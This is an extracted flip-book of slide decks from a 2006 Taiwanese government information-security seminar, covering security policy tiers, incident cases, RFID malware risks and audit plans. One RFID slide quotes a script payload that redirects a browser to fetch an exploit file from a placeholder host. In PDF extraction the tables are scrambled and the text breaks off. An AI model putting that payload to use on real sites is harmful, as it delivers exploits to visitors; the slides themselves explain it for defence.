活動資料 - 資通安全研發中心- 國立成功大學
活動資料 - 資通安全研發中心- 國立成功大學
活動資料 - 資通安全研發中心- 國立成功大學
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
組 織 改 造 與 強 化 資 通 安 全 之 對 策 研 討 會 議 程<br />
目 前 正 在 積 極 推 動 政 府 改 造 , 將 整 併 及 精 簡 現 有 的 政 府 組 織 , 朝 向 更 為 有 效 率 及 效 能 的 廉 能 政 府 。<br />
由 於 組 織 架 構 的 變 動 , 資 訊 安 全 的 相 關 工 作 勢 必 也 須 要 隨 著 業 務 及 組 織 而 有 所 更 動 與 調 整 , 本 研 討 會<br />
邀 請 學 者 專 家 一 同 就 組 織 改 造 與 強 化 資 通 安 全 的 相 關 議 題 與 對 策 進 行 討 論 與 座 談 , 期 望 藉 由 相 關 的 專<br />
家 激 盪 出 在 組 織 改 造 的 同 時 促 進 及 強 化 整 體 資 通 安 全 之 對 策 。<br />
指 導 單 位 : 行 政 院 科 技 顧 問 組<br />
主 辦 單 位 : 成 功 大 學 資 通 安 全 研 發 中 心<br />
協 辦 單 位 : 行 政 院 研 究 發 展 考 核 委 員 會 、 法 務 部 、 內 政 部 資 訊 中 心 、 主 計 處 電 子 資 料 處 理 中 心 、<br />
台 北 縣 政 府 、 台 灣 微 軟 股 份 有 限 公 司<br />
日 期 :2006 年 4 月 14 日 ( 星 期 五 )。<br />
地 點 : 台 大 醫 院 國 際 會 議 中 心 402AB 會 議 室<br />
台 北 市 中 正 區 徐 州 路 二 號<br />
時 間 項 目 邀 請 演 講 之 專 家 主 持 人<br />
09:00~09:20 報 到<br />
09:20~09:30<br />
賴 教 授 溪 松<br />
開 幕<br />
陳 副 主 任 委 員 俊 麟<br />
09:30~10:00 專 題 演 講 主 題 :<br />
資 安 政 策<br />
行 政 院 科 技 顧 問 組<br />
陳 主 任 如 芬<br />
行 政 院 研 考 會<br />
陳 副 主 任 委 員 俊 麟<br />
10:00~10:30 專 題 演 講 主 題 :<br />
由 RFID 探 討 我 國 資 訊<br />
安 全 策 略 之 建 議<br />
10:30~10:50 茶 敘<br />
10:50~11:20 專 題 演 講 主 題 :<br />
資 通 安 全 稽 核 現 況<br />
行 政 院 國 家 資 通 安 全 會 報<br />
技 術 服 務 中 心<br />
劉 主 任 培 文<br />
主 計 處 電 子 資 料 處 理 中 心<br />
李 分 析 師 茂 基<br />
內 政 部 資 訊 中 心<br />
沈 主 任 金 祥<br />
主 計 處 電 子 資 料 處 理 中 心<br />
劉 副 主 任 勝 東<br />
11:20~11:50 專 題 演 講 主 題 :<br />
組 織 改 造 資 訊 整 合 之 資<br />
安 案 例 探 討<br />
11:50~13:30 午 餐<br />
13:30~14:00 專 題 演 講 主 題 :<br />
規 劃 集 中 型 資 安 環 境 之<br />
經 驗 分 享 ─ 以 台 北 縣 政<br />
府 為 例<br />
14:00~14:30 專 題 演 講 題 目 :<br />
網 站 安 全 與 滲 透 測 試<br />
台 灣 微 軟 股 份 有 限 公 司<br />
(Microsoft )<br />
史 經 理 百 誠<br />
胡 經 理 士 亮<br />
台 北 縣 政 府 資 訊 中 心<br />
謝 主 任 翠 娟<br />
成 大 電 機 系<br />
賴 教 授 溪 松<br />
14:30~14:50 茶 敘<br />
專 題 演 講 題 目 :<br />
14:50~15:20 法 務 部 資 安 工 作 經 驗 分<br />
享<br />
座 談 會 主 題 :<br />
15:20~16:20 組 織 改 造 與 強 化 資 通 安<br />
全 之 對 策<br />
會 議 網 站 :http://www.icsc.ncku.edu.tw/seminar/<br />
法 務 部 資 訊 處<br />
陳 處 長 泉 錫<br />
陳 如 芬 主 任 、 陳 泉 錫 處 長 、<br />
何 全 德 處 長 、 劉 勝 東 副 主<br />
任 、 謝 翠 娟 主 任<br />
成 大 電 機 系<br />
賴 教 授 溪 松<br />
行 政 院 研 考 會<br />
林 副 處 長 裕 權<br />
行 政 院 科 技 顧 問 組<br />
陳 主 任 如 芬<br />
行 政 院 研 考 會<br />
何 處 長 全 德<br />
成 大 電 機 系<br />
賴 教 授 溪 松
組 織 改 造 與 強 化 資 通 安 全 對 策 研 討 會<br />
政 府 機 關 推 動<br />
資 訊 安 全 之 挑 戰<br />
行 政 院 科 技 顧 問 組<br />
陳 主 任 如 芬<br />
2006 年 4 月 14 日<br />
大 綱<br />
一 、 前 言<br />
二 、 從 案 例 看 資 安 風 險<br />
三 、 政 府 作 為<br />
四 、 現 階 段 推 動 資 通 訊 安 全 挑 戰<br />
五 、 掌 握 關 鍵 成 功 因 素<br />
六 、 結 語<br />
2<br />
1
組 織 改 造 與 強 化 資 通 安 全 對 策 研 討 會<br />
資 安 威 脅 典 範 移 轉<br />
木 馬<br />
病 毒 蠕 蟲 混 種 垃 圾 郵 件 間 諜 軟 體<br />
木 馬<br />
• 病 毒 、 蠕 蟲 、 竊 取 、 竄 改 …<br />
• 網 頁 的 覆 蓋 (2001)<br />
• 2001.04.30 21:00 中 美 駭 客 大 戰<br />
• 自 動 化 病 毒 (2001 迄 今 )<br />
• 情 資 的 竊 取 (2002 迄 今 )<br />
• 「 嘗 試 錯 誤 法 」 侵 入 他 人 帳 號<br />
• 防 火 牆 的 突 穿<br />
• 情 資 的 竄 改<br />
3<br />
威 脅 來 源<br />
• 人 為 威 脅 83%~85% , 天 然 威 脅 15%~17%<br />
• 內 部 威 脅 約 75%, 外 部 威 脅 約 25%<br />
• 內 部 威 脅<br />
• 較 不 容 易 的 攻 擊 ( 約 十 倍 的 困 難 )<br />
• 疏 失 ( 組 態 錯 誤 、 管 理 鬆 散 、 犯 錯 失 誤 )<br />
• 外 部 威 脅<br />
• 78% 來 自 網 際 網 路 連 線<br />
• (1999 佔 57%)<br />
資 料 來 源 :FBI 相 關 研 究 報 告<br />
4<br />
2
組 織 改 造 與 強 化 資 通 安 全 對 策 研 討 會<br />
資 訊 安 全<br />
人 人 有 責<br />
系 統 管 理 者<br />
/ 資 訊 人 員<br />
CIO<br />
每 一 個 人<br />
系 統 控 管<br />
保 護 資 源<br />
安 全<br />
保 護 資 料<br />
隱 私<br />
資 訊 安 全<br />
保 護 資 訊<br />
時 間 、 認 知 、 法 律<br />
5<br />
從 案 例 看 資 安 風 險<br />
專 案<br />
事<br />
件<br />
通<br />
報<br />
影 響<br />
範 圍<br />
事<br />
件<br />
處<br />
置<br />
A<br />
A 機 關 收 到 偽 冒 身<br />
分 電 子 郵 件 通 報 技<br />
術 服 務 中 心 , 經 鑑<br />
識 分 析 後 發 現 該 郵<br />
件 中 夾 藏 後 門 程 式<br />
超 過 40 台 電 腦 遭<br />
入 侵<br />
協 助 A 機 關 立 刻 利<br />
用 防 火 牆 系 統 阻 斷<br />
駭 客 連 線 , 受 害 設<br />
備 已 完 成 作 業 系 統<br />
重 新 安 裝<br />
B<br />
B 機 關 發 現 資 安<br />
事 件 通 報 技 術 服<br />
務 中 心 協 助 處 理<br />
2 部 對 外 服 務 的<br />
Web 主 機 遭 入 侵<br />
協 助 B 機 關 針 對<br />
網 路 架 構 及 管 理<br />
機 制 提 出 改 善 建<br />
議<br />
C<br />
由 A 專 案 事 件 資 料 關 聯<br />
性 發 現 ,C 機 關 已 遭 入<br />
侵<br />
超 過 70 台 電 腦 遭 入 侵 ,<br />
其 中 3 台 為 伺 服 器 主<br />
機 ; 被 竊 資 料 與 國 際 合<br />
作 事 宜 相 關<br />
已 協 助 C 機 關 立 刻 建 立<br />
中 繼 站 黑 名 單 阻 擋 機<br />
制 , 並 持 續 過 濾 內 部 其<br />
他 設 備<br />
D<br />
由 惡 意 電 子 郵<br />
件 分 析 , 技 術<br />
服 務 中 心 前 往<br />
駭 客 中 繼 站 進<br />
行 網 路 側 錄<br />
經 分 析 側 錄 資<br />
料 發 現 ,D1 機<br />
關 超 過 100 台 電<br />
腦 遭 入 侵 ,D2<br />
機 關 超 過 200 台<br />
電 腦 遭 入 侵<br />
立 即 通 知 D1 及<br />
D2 機 關 , 並 提<br />
供 技 術 協 助<br />
6<br />
3
組 織 改 造 與 強 化 資 通 安 全 對 策 研 討 會<br />
國 家 資 通 安 全 會 報<br />
• 2000.08.30 總 統 核 定 「 建 立 我 國 通 資 訊 基 礎 建 設 安<br />
全 機 制 」<br />
• 2001.01.17 行 政 院 會 通 過 「 建 立 我 國 通 資 訊 基 礎 建<br />
設 安 全 機 制 計 畫 」<br />
• 成 立 國 家 資 通 安 全 會 報 , 提 高 資 通 安 全 決 策 層 次 ,<br />
編 組 專 職 人 員 統 合 推 動 協 調 相 關 工 作<br />
• 2004.03 行 政 院 會 通 過 第 二 期 機 制 計 畫<br />
7<br />
我 國 資 通 安 全 發 展 願 景<br />
確 保 我 國 擁 有 安 全 、 可 信 賴 的 資 訊 通 訊 環 境<br />
建 立 國 家 資 通 安 全 事 件 通 報<br />
及 危 機 應 變 體 系<br />
健 全 國 家 資 通 安 全 防 護 能 力<br />
強 化 國 家 資 通 安 全 認 知<br />
與 訓 練 推 廣 作 業<br />
確 保 國 家 資 通 安 全<br />
及 促 進 國 際 合 作<br />
8<br />
4
組 織 改 造 與 強 化 資 通 安 全 對 策 研 討 會<br />
重 要 政 策<br />
1. 資 訊 安 全 責 任 等 級 分 級<br />
2. 重 要 民 生 基 礎 建 設 資 通 安 全 保 護<br />
3. 推 動 稽 核 制 度<br />
4. CISO 資 訊 安 全 長 責 任 制 度<br />
9<br />
資 訊 安 全 責 任 等 級 分 級<br />
作 業<br />
\<br />
等 級<br />
防 禦 機<br />
制 強 度<br />
防 護 縱 深<br />
ISMS 推 動 作<br />
業<br />
稽 核 方 式<br />
資 安 教 育 訓 練 ( 主<br />
官 、 主 管 、 技<br />
術 、 一 般 )<br />
專 業 證 照<br />
A 級<br />
強 度 等<br />
級 4<br />
NSOC/SOC,ID<br />
S, 防 火 牆 , 防 毒<br />
96 年 通 過 第<br />
三 者 認 証 ( 註<br />
二 )<br />
每 年 至 少<br />
執 行 二 次<br />
內 稽<br />
(4,6,18,4 小 時 )/<br />
每 年<br />
96 年 資 安 專<br />
業 鑑 定 二 張<br />
( 註 三 )<br />
B 級<br />
強 度 等<br />
級 3<br />
SOC(OP),IDS,<br />
防 火 牆 , 防 毒<br />
97 年 通 過 第<br />
三 者 認 証<br />
每 年 至 少<br />
執 行 一 次<br />
內 稽<br />
(4,6,16,4 小 時 )/<br />
每 年<br />
96 年 資 安 專<br />
業 鑑 定 一 張<br />
C 級<br />
D 級<br />
強 度 等<br />
級 2<br />
強 度 等<br />
級 1( 註<br />
一 )<br />
IDS, 防 火 牆 , 防<br />
毒<br />
防 火 牆 , 防 毒<br />
各 單 位 自 行 成<br />
立 推 動 小 組 規<br />
劃 作 業<br />
推 動 ISMS 觀<br />
念 宣 導<br />
自 我 檢 視<br />
自 我 檢 視<br />
(2,6,12,4 小 時 )/<br />
每 年<br />
(1,4,8,2 小 時 )/ 每<br />
年<br />
資 安 專 業 訓<br />
練<br />
資 安 專 業 訓<br />
練<br />
10<br />
5
組 織 改 造 與 強 化 資 通 安 全 對 策 研 討 會<br />
重 要 民 生 基 礎 建 設 資 通 安 全 保 護<br />
• 選 定 重 要 基 礎 建 設 資 訊<br />
系 統<br />
• 政 府 、 安 全 、 金 融 服 務 、 能<br />
源 設 施 、 供 水 、 電 信 郵 政 、<br />
交 通 運 輸 、 醫 療 保 健<br />
• 由 主 管 機 關 督 導 目 的 事<br />
業 機 構 落 實 執 行 保 護 措<br />
施<br />
• 建 立 資 安 資 訊 分 享 與 分<br />
析 中 心 (ISAC)<br />
11<br />
建 立 資 安 資 訊 分 析 與 分 享 中 心<br />
• 逐 步 推 動 重 要 核 心 政 府 機 關 及 關 鍵 民 生 基 礎 建 設 ( 每 年<br />
1~2 個 ) 建 立 ISAC<br />
• 政 府 與 民 間 合 作<br />
資 料 來 源 :http://www.cisco.com/...<br />
12<br />
6
組 織 改 造 與 強 化 資 通 安 全 對 策 研 討 會<br />
推 動 稽 核 制 度<br />
• 完 備 政 府 機 關 稽 核 制 度<br />
• 建 立 內 部 稽 核 制 度<br />
• 將 資 安 內 稽 列 為 年 度 例 行 資 安 工 作 重 點<br />
• 主 管 機 關 及 重 要 資 訊 單 位 率 先 實 施<br />
• 深 化 內 部 稽 核 制 度 , 要 求 所 屬 單 位 落 實 執 行<br />
• 透 過 外 部 稽 核 檢 討 評 估 與 持 續 改 善<br />
• 建 立 目 的 事 業 單 位 稽 核 制 度<br />
13<br />
CISO 資 訊 安 全 長 責 任 制 度<br />
• 各 單 位 負 責 本 身 資 安 責 任<br />
• 由 副 首 長 擔 任 CISO 資 訊 安 全 長 , 協 助 首 長 善<br />
盡 維 護 資 安 的 責 任<br />
• 成 立 資 通 安 全 處 理 小 組 , 指 派 專 人 控 管 資 安<br />
• 落 實 公 務 機 密 維 護<br />
• 確 實 評 估 資 訊 資 產<br />
• 培 育 人 才 、 提 升 認 知 與 培 養 防 護 能 力<br />
• 在 資 訊 預 算 中 編 列 適 當 比 例 資 安 預 算 , 並 列 為 最 優 先<br />
納 入 年 度 預 算 內<br />
14<br />
7
組 織 改 造 與 強 化 資 通 安 全 對 策 研 討 會<br />
現 階 段 推 動 資 通 訊 安 全 挑 戰<br />
• 管 理 鬆 散<br />
• 資 訊 ( 安 ) 人 力 不 足 、 專 業 待 加 強<br />
• 預 算 不 足<br />
• 使 用 者 認 知 、 警 覺 性 不 夠 及 行 為 未 落 實<br />
• 主 導 稽 核 員 人 力 未 充 分 再 訓 練 與 運 用<br />
藉 由 高 階 管 理 階 層 的 支 持 與 推 動 , 克 服 挑 戰 !<br />
15<br />
結 語<br />
• 掌 握 關 鍵 成 功 因 素<br />
• 反 映 單 位 施 政 ( 營 運 ) 目 標 的 資 通 安 全 政 策<br />
• 與 組 織 文 化 一 致 的 實 施 方 法<br />
• 管 理 階 層 明 顯 的 支 持 與 承 諾<br />
• 清 楚 了 解 需 求<br />
• 將 資 通 安 全 概 念 有 效 傳 達 給 管 理 者 與 員 工<br />
• 讓 員 工 與 承 包 商 知 悉 資 安 政 策 與 標 準<br />
• 適 當 的 訓 練 與 教 育<br />
• 評 估 測 試 與 持 續 改 善<br />
資 料 來 源 :BS7799-2:2002, 綜 合 規 劃 組 整 理<br />
16<br />
8
組 織 改 造 與 強 化 資 通 安 全 對 策 研 討 會<br />
Thank You<br />
9
C<br />
組 織 改 造 與 強 化 資 通 安 全 之 對 策 研 討 會<br />
從 RFID 簡 探 報 討 格 式 資 安 策 略<br />
技 術 服 務 中 心<br />
劉 培 文 博 士<br />
國 家 資 通 安 全 會 報 技 術 服 務 中 心<br />
Dec. 劉 培 15, 文 主 2004 任<br />
Apr. 14, 2006<br />
1<br />
C<br />
Is Your Cat Infected with<br />
a Computer Virus<br />
• 荷 蘭 Vrije 大 學 (Melanie R. Rieback et al.) 在 IEEE<br />
PerCom06 發 表 了 本 篇 引 起 廣 泛 討 論 之 論 文<br />
• 本 篇 論 文 提 出 的 主 要 論 點 包 括<br />
– 儲 存 在 RFID 標 籤 中 的 資 料 可 被 用 來 攻 擊 後 端 軟 體 系 統<br />
– 首 隻 可 自 我 複 製 之 RFID 病 毒 POC (Proof-of-Concept), 以<br />
RFID 標 籤 配 合 SQL Injection 進 行 危 害 及 傳 播<br />
– RFID 中 繼 軟 體 (middleware) 的 發 展 者 應 建 立 適 切 的 資 料 檢<br />
查 機 制 , 以 避 免 RFID 中 繼 軟 體 產 生 網 際 網 路 上 著 名 的 常<br />
見 弱 點<br />
2
C<br />
RFID 惡 意 軟 體 測 試 平 台<br />
• 此 測 試 環 境 利 用 之 弱 點<br />
– 資 料 庫<br />
• SQL Injection<br />
– Web-based 元 件 (client-side scripting 或 SSI)<br />
• document.location='http://ip/exploit.wmf';<br />
• <br />
– Glue code connects reader to middleware<br />
• buffer-overflow<br />
3<br />
C<br />
Deploy Now, Secure Later or Never<br />
With respect to the students involved, the paper as<br />
presented is rather weak. The 'real' virus, they claim to<br />
demonstrate in the paper, is not a virus, just a selfreplicating<br />
piece of SQL code.<br />
Kevin Ashton, VP, ThingMagic<br />
co-founder of MIT Auto-ID Center<br />
Companies need to provide multi-level security and take<br />
responsibility for testing before releasing applications to the<br />
market<br />
Julie England, VP,Texas Instruments<br />
4
C<br />
風 險 生 命 週 期<br />
• 風 險 = 價 值 x 威 脅 x 弱 點 x 發 生 的 機 率<br />
5<br />
Source: Nick Ellsmore, “Security Fatigue: Threatening The Culture of Security”,<br />
APEC/OECD Security Workshop Seoul, Korea, Sep. 5-6, 2005<br />
C<br />
網 路 化 社 會 的 風 險 實 例<br />
6<br />
• 價 值 (Value)<br />
– 個 人 資 訊 、 商 業 資 訊 、 公 務 機 密<br />
– 美 國 FTC 估 計 每 年 有 3 百 20 萬 人 ID 遭 到 竊 取<br />
– 根 據 賽 門 鐵 克 表 示 , 濫 發 電 子 郵 件 者 或 網 路 釣 魚 人 士<br />
出 租 一 個 有 大 約 5,500 台 殭 屍 電 腦 (Zombie) 的 網 路 , 每 週<br />
租 金 約 為 350 美 金<br />
• 威 脅 (Threat)<br />
– 23% 美 國 民 眾 每 月 遭 受 網 路 釣 魚 (phishing) 攻 擊<br />
– Zero-day Attack (e.g. MS05-036)<br />
– 而 從 去 年 Sasser 大 規 模 爆 發 後 , 網 路 大 規 模 攻 擊 轉 趨 沈<br />
寂 , 使 用 端 安 全 防 護 需 求 日 漸 提 高 , 駭 客 的 動 機 已 從<br />
出 名 轉 向 真 正 的 錢 財
C<br />
網 路 化 社 會 的 風 險 實 例<br />
7<br />
• 弱 點 (Vulnerability)<br />
– CERT/CC 通 報 之 弱 點 數<br />
– 無 線 網 路 的 設 定 與 管 理<br />
• 沿 台 北 市 東 區 至 火 車 站 , 四 天 共 偵 測 到 460 個 無 線 網 路 AP, 其 中 僅 182<br />
個 使 用 WEP 加 密<br />
– 人 性 弱 點 (e.g. 遭 受 網 路 釣 魚 的 美 國 民 眾 , 有 70% 相 信 郵 件 的 真 實 性 )<br />
• 發 生 機 率 (Probability)<br />
– 今 年 我 國 整 體 產 業 連 網 普 及 率 達 到 83%, 各 項 基 礎 網 路 應 用 中 , 又<br />
以 無 線 區 域 網 路 (WLAN) 普 及 率 成 長 最 顯 著 , 接 近 20%<br />
– 現 行 IPv4 最 多 只 能 容 納 2 32 個 IP 數 , 但 IPv6 的 IP 數 則 可 高 達 2 96<br />
– Ubiquitous Network Society 的 5 Any (Any-Time, Any-Where, Any-Network,<br />
Any-Device, Any-Service)<br />
C<br />
資 訊 安 全 威 脅 趨 勢<br />
Means<br />
How To<br />
Objects<br />
What To<br />
SPAMs<br />
Viruses<br />
Trojan<br />
Horses<br />
Phishing<br />
Worms<br />
BOTs<br />
ID Fraud<br />
Hack<br />
for Fun<br />
Exploit<br />
for Money<br />
8
C<br />
網 路 犯 罪 之 轉 變 趨 勢<br />
• “Tech Freaks” to “Propaganda” to “Fraud on Net”<br />
Damages<br />
Attacker<br />
Attacker’s Objectives<br />
9<br />
Real Damages<br />
Loss of Data<br />
Systems Compromise<br />
Systems Down<br />
Network Crash<br />
Web Compromise<br />
Business Halt<br />
ID Theft<br />
Monetary Damages<br />
Viruses<br />
Worms<br />
Trojan Horses<br />
BOTs<br />
Phishing<br />
ID Frauds<br />
Fun<br />
Fame<br />
In the Dark Side<br />
Political<br />
Messaging<br />
Becoming<br />
Someone Else<br />
Stealing<br />
Goods & Money<br />
C<br />
網 路 攻 擊 時 間 大 幅 縮 短<br />
Security Bulletin<br />
MS02-039<br />
039<br />
MS03-026<br />
026<br />
MS03-039<br />
039<br />
MS03-049<br />
049<br />
MS04-011<br />
011<br />
MS05-039<br />
039<br />
Announcement<br />
(yy/mm/dd)<br />
2002/7/29<br />
2003/7/17<br />
2003/9/11<br />
2003/11/12<br />
2004/4/14<br />
2005/8/10<br />
Lead<br />
time<br />
58 days<br />
10<br />
4<br />
1<br />
11<br />
2<br />
Exploit code<br />
Emergence<br />
(yy/mm/dd)<br />
2002/9/25<br />
2003/7/27<br />
2003/9/15<br />
2003/11/13<br />
2004/4/25<br />
-2005/8/12<br />
Lead<br />
time<br />
4 mo<br />
16<br />
days<br />
5 mo<br />
2 mo<br />
6 days<br />
1<br />
day<br />
1 st Attack<br />
Occurrence<br />
2003/1/25<br />
SQL Slammer<br />
2003/8/12<br />
Blaster<br />
2004/2/11<br />
Welchia.B<br />
2004/2/11<br />
Welchia.B<br />
2004/5/1<br />
Sasser<br />
2005/8/13<br />
Zotob<br />
10<br />
rapidly reducing
C<br />
美 國 CERT/CC 歷 年 弱 點 通 報 數<br />
11<br />
C<br />
資 訊 安 全 整 體 SWOT 分 析<br />
S<br />
‧ 資 訊 安 全 漸 成 全 球 共 識<br />
‧ 全 球 資 安 市 場 已 漸 成 形<br />
‧ 消 費 者 保 護 意 識 逐 漸 抬 頭<br />
‧ 使 用 者 資 訊 能 力 逐 年 提 升<br />
SWOT<br />
‧ 網 際 網 路 存 在 許 多 弱 點<br />
‧ 資 訊 系 統 弱 點 層 出 不 窮<br />
‧ 使 用 者 不 了 解 資 訊 風 險<br />
‧ 資 安 投 資 整 體 比 例 仍 低<br />
W<br />
12<br />
‧ 各 國 相 繼 投 入 資 訊 建 設<br />
‧ 下 一 代 網 際 網 路 逐 漸 成 形<br />
‧ 資 訊 安 全 相 關 國 際 標 準<br />
‧ 法 令 規 章 環 境 逐 漸 改 善<br />
O<br />
‧ 隱 私 權 保 護 問 題 日 益 嚴 重<br />
‧ 駭 客 犯 罪 目 標 轉 變<br />
‧ 網 路 犯 罪 工 具 取 得 容 易<br />
‧ 電 腦 病 毒 爆 發 時 間 縮 短<br />
T
C<br />
資 訊 安 全 整 體 SWOT 策 略<br />
13<br />
外 部 環 境<br />
內 部 環 境<br />
機 會 (O)<br />
• 各 國 相 繼 投 入 資 訊 建 設<br />
• 下 一 代 網 際 網 路 逐 漸 成 形<br />
• 資 訊 安 全 相 關 國 際 標 準<br />
• 法 令 規 章 環 境 逐 漸 改 善<br />
威 脅 (T)<br />
• 隱 私 權 保 護 問 題 日 益 嚴 重<br />
• 駭 客 犯 罪 目 標 轉 變<br />
• 網 路 犯 罪 工 具 取 得 容 易<br />
• 電 腦 病 毒 爆 發 時 間 縮 短<br />
優 勢 (S)<br />
• 資 訊 安 全 漸 成 全 球 共 識<br />
• 全 球 資 安 市 場 已 漸 成 形<br />
• 消 費 者 保 護 意 識 逐 漸 抬 頭<br />
• 使 用 者 資 訊 能 力 逐 年 提 升<br />
SO 策 略<br />
• 加 速 推 動 下 一 代 安 全 網 路<br />
• 健 全 資 安 相 關 法 令 規 章<br />
• 安 全 可 信 任 電 子 商 務 環 境<br />
• 建 立 使 用 者 網 路 行 為 準 則<br />
ST 策 略<br />
• 強 化 電 腦 犯 罪 防 治 能 力<br />
• 跨 國 資 安 事 件 處 理 機 制<br />
• 建 立 資 安 防 禦 縱 深 觀 念<br />
• 資 安 產 業 推 動 計 畫<br />
劣 勢 (W)<br />
• 網 際 網 路 存 在 許 多 弱 點<br />
• 資 訊 系 統 弱 點 層 出 不 窮<br />
• 使 用 者 不 了 解 資 訊 風 險<br />
• 資 安 投 資 整 體 比 例 仍 低<br />
WO 策 略<br />
• 發 展 安 全 之 通 訊 協 定<br />
• 推 動 資 訊 安 全 管 理<br />
• 資 訊 安 全 產 品 認 驗 證<br />
• 提 升 使 用 者 資 安 認 知<br />
WT 策 略<br />
• 資 訊 系 統 安 全 確 保<br />
• 推 動 企 業 資 訊 安 全 治 理<br />
• 落 實 軟 體 安 全 工 程 訓 練<br />
• 建 立 資 安 風 險 評 估 制 度<br />
C<br />
How can we fly to NY<br />
safely?<br />
飛 安 vs. 資 安<br />
CKS<br />
Management<br />
- Airplane navigation<br />
- System administration<br />
- Airplane maintenance<br />
- System maintenance<br />
- Training pilots pilots<br />
- Training staff staff<br />
-Aviation service<br />
-IT -IT service<br />
- Compliance<br />
- Compliance<br />
JFK<br />
ISMS (2002.4-), Information<br />
Security Audit (2003.4-),<br />
Information Security<br />
Governance (2005.3-)<br />
Airline case Information system case Evaluation / Assurance system<br />
Certification of of body:<br />
-Body strength<br />
Type Type certification of of Engines<br />
- Capability of of airplane<br />
-Performance of of Engines<br />
-Strength of of parts parts<br />
-Output of of Energy<br />
Secure<br />
Secure body,<br />
core<br />
parts, and<br />
module<br />
functions<br />
Certify:<br />
- Implementation of of Cryptographic<br />
- Secure IT IT products / systems<br />
Algorithms<br />
- Security Functions / capabilities<br />
- Security of of Cryptographic modules<br />
- Effectiveness of of Cryptographic<br />
algorithms<br />
Common Criteria<br />
(ISO/IEC15408) IT IT Security<br />
Cryptographic<br />
Evaluation & Certification<br />
Algorithms Validation Program (CAVP)<br />
Cryptographic<br />
Scheme (2001.4-)<br />
Module Validation Program (CMVP)<br />
14<br />
CRYPTREC (2000.4-)
C<br />
推 動 企 業 資 訊 安 全 治 理<br />
• 公 司 治 理<br />
– 公 司 治 理 主 要 著 眼 於 企 業 所<br />
有 與 企 業 經 營 分 離 之 現 代 公<br />
司 組 織 體 系 下 , 如 何 透 過 法<br />
律 的 制 衡 管 控 設 計 , 有 效 監<br />
督 企 業 的 組 織 活 動 , 以 及 如<br />
何 健 全 企 業 組 織 運 作 , 防 止<br />
脫 法 行 為 之 經 營 弊 端<br />
• 應 研 究 如 何 使 企 業 資 訊 安<br />
全 治 理 成 為 公 司 治 理 的 一<br />
環<br />
15<br />
C<br />
資 訊 安 全 風 險 評 估<br />
• Example<br />
– 日 本 IPA 所 發 展 之 自 我 評 估 基 準 (benchmark)<br />
Information<br />
Security<br />
Countermeasures<br />
Scoring<br />
You are<br />
here<br />
X<br />
X: Information Security is not immediately requisite<br />
: Moderate level of Information Security is expected<br />
: High level of Information Security is required<br />
16<br />
Volatility of Business Nature against Information Security<br />
+ Significance of Social Involvement
C<br />
安 全 文 化 構 面<br />
資 訊 安 全 整 體 策 略 地 圖<br />
提 升 使 用 者 資 安 認 知<br />
落 實 軟 體 安 全 工 程 訓 練<br />
建 立 使 用 者 網 路 行 為 準 則<br />
企 業 流 程 構 面<br />
推 動 資 訊 安 全 管 理<br />
推 動 企 業 資 訊 安 全 治 理<br />
建 立 資 安 風 險 評 估 制 度<br />
安 全 可 信 任 電 子 商 務 環 境<br />
資 安 產 業 構 面<br />
發 展 安 全 之 通 訊 協 定<br />
建 立 資 安 防 禦 縱 深 觀 念<br />
資 訊 安 全 產 品 認 驗 證<br />
資 訊 系 統 安 全 確 保<br />
政 府 責 任 構 面<br />
17<br />
跨 國 資 安 事 件 處 理 機 制<br />
強 化 電 腦 犯 罪 防 治 能 力<br />
資 安 產 業 推 動 計 畫<br />
健 全 資 安 相 關 法 令 規 章
資 安 稽 核 服 務 推 動 簡 報<br />
行 政 院 主 計 處 電 子 處 理 資 料 中 心<br />
分 析 師 李 茂 基<br />
電 子 信 箱 :mjlee@dgbas.gov.tw<br />
電 話 :23803859<br />
中 華 民 國 九 十 五 年<br />
1<br />
報 告 大 綱<br />
壹 、 資 安 外 部 稽 核<br />
一 、 辦 理 依 據<br />
二 、 稽 核 目 的<br />
三 、 稽 核 規 劃<br />
四 、 資 安 整 體 準 備 情 形 統 計 表<br />
五 、 稽 核 檢 討<br />
貳 、 資 安 內 部 稽 核<br />
一 、 緣 起<br />
二 、 推 動 目 的<br />
三 、 推 動 策 略<br />
四 、 結 果 說 明<br />
2
)<br />
)<br />
壹 、 資 安 外 部 稽 核<br />
一 、 辦 理 依 據<br />
依 據 九 十 一 年 六 月 六 日 行 政 院 院 長 核 定 第 二 次 修<br />
訂 「 建 立 我 國 通 資 訊 基 礎 建 設 安 全 機 制 計 畫 」<br />
3<br />
國 家 資 通 安 全<br />
諮 詢 委 員 會<br />
行 政 院 國 家 資 通 安 全 會 報 組 織 架 構<br />
國 家 資 通 安 全 會 報<br />
總 召 集 人 : 副 院 長 兼 執 行 長 : 科 技 顧 問 組 執 行 秘 書 兼<br />
副 總 召 集 人 : 林 政 務 委 員 逢 慶 兼<br />
副 執 行 長 : 主 計 處 電 子 中 心 主 任 兼<br />
研 考 會 主 委 兼<br />
國 防 部 派 員 兼<br />
委 員 : 部 會 及 直 轄 市 副 首 長 兼 研 考 會 資 管 處 長 兼<br />
標 準 規 範 組<br />
( 經 濟 部 )<br />
研 考 會 、 國 防 部<br />
交 通 部 、 財 政 部<br />
稽 核 服 務 組<br />
( 主 計 處 )<br />
國 防 部 、 交 通 部<br />
經 濟 部 、 財 政 部<br />
法 規 偵 防 組<br />
( 法 務 部 )<br />
內 政 部 、 國 防 部<br />
交 通 部<br />
資 訊 蒐 集 分<br />
析 組<br />
( 國 科 會 )<br />
中 科 院 、 工 研 院 、 資<br />
策 會 、 相 關 公 協 會 、<br />
民 間 業 者<br />
通 報 應 變 組<br />
( 研 考 會 )<br />
主 計 處 、 內 政 部 、 國 防 部 、<br />
交 通 部 、 財 政 部 、 經 濟 部 、<br />
教 育 部 、 衛 生 署<br />
綜 合 規 劃 組<br />
( 科 顧 組 )<br />
事<br />
業<br />
機<br />
構<br />
衛<br />
分<br />
生<br />
組<br />
署<br />
( 四<br />
事<br />
業<br />
機<br />
構<br />
分<br />
財 組<br />
政<br />
部 ║<br />
一<br />
事<br />
業<br />
機<br />
構<br />
交<br />
分<br />
通<br />
組<br />
部<br />
( 二<br />
事<br />
業<br />
機<br />
構<br />
經<br />
分<br />
濟<br />
組<br />
部<br />
( 一<br />
)<br />
)<br />
)<br />
事<br />
業<br />
機<br />
構<br />
分<br />
金 組<br />
管<br />
會 ║<br />
二<br />
( 三<br />
( 三<br />
學<br />
術<br />
機<br />
構<br />
教 分<br />
育 組<br />
部<br />
行<br />
政<br />
機<br />
研<br />
構<br />
考<br />
分<br />
會<br />
組<br />
國<br />
防<br />
體<br />
國<br />
系<br />
防<br />
分<br />
